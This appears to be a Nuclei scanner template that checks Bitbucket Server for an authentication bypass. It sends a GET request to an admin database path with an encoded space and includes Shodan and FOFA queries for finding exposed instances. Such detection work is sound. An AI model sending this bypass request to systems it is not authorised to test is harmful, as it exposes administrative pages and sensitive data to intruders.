nuclei-templates/http/misconfiguration/bitbucket-auth-bypass.yaml

39 lines
1.3 KiB
YAML

id: bitbucket-auth-bypass
info:
name: Bitbucket Server > 4.8 - Authentication Bypass
author: DhiyaneshDk
severity: critical
description: |
There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md
classification:
cpe: cpe:2.3:a:atlassian:bitbucket_data_center:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: atlassian
product: bitbucket_data_center
shodan-query: title:"Log in - Bitbucket"
fofa-query: title="Log in - Bitbucket"
tags: misconfig,atlassian,bitbucket,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/admin%20/db"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<h2>Database</h2>"
- "Migrate database"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100fdf192a557551617872b74732ff32d5520c2e9eed55eeedc06a774416693c05e022038eeaf8290244b3eb3f4e1fde16811b08b9e2e133b60be833551da52593f990c:922c64590222798bb761d5b6d8e72950